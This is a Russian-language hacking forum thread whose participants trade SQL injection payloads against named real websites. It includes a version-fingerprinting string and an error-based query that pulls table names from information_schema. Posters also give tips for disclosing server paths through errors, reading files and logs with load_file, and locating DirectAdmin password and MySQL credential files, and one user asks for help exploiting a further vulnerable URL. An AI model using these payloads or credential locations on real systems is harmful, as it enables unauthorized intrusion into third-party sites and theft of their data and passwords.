там скулище ))) выделил

а сейчас попробуй and 1=0

http://www.hayesbklaw.com/index.php?id=1'+and+substring(version(),1,1)='5

или

http://www.hayesbklaw.com/index.php?id=1'%20or%20(select%20count(*)%20from%2 0(select%201%20union%20select%202%20union%20select %203)x%20group%20by%20concat((select+table_name+fr om+information_schema.tables+limit+1),floor(rand(0 )*2)))--+

Какие методы вывода путя до корня из sqli

п.с искат по всем страницам было не охотт(((

кроме []

Пробуйте через идентификатор сесии и не парьтесь(но не факт что она стартует!), а так провоцируйте ресурс к "неожиданным(недокументиро ваным) ситуациям", любым, которые и выплюнут(возможно) ошибку.

Если sqli сопровождаетцо инклудом(читалкой ...) можно запросить несуществующий файл и если ошибки не подавлены, то будет ошибка. При не верном запросе, также можно еще попытатцо логи прочитайть если есть привилегии у пользователя mysql(если речь о mysql иньекциях load_file!), например лог с ошибками(запросить перед етим несущетсвующий файл), ну понятно что надо искать лог.

одним словом варианты есть (чем > практики тем больше фантазии! ).

гугл в помочь еще.

зы не надо привязыватцо для раскрытия к sqli только.

подскажите где директ админ пароли пользователей хранит? в шадов?

искать где-то тут надо наверно: /usr/local/directadmin/

тут пароль от мускуля /usr/local/directadmin/conf/mysql.conf

http://newsmarked.info/userrss.php?user=hiioarvey&status=1'

не могу раскрутить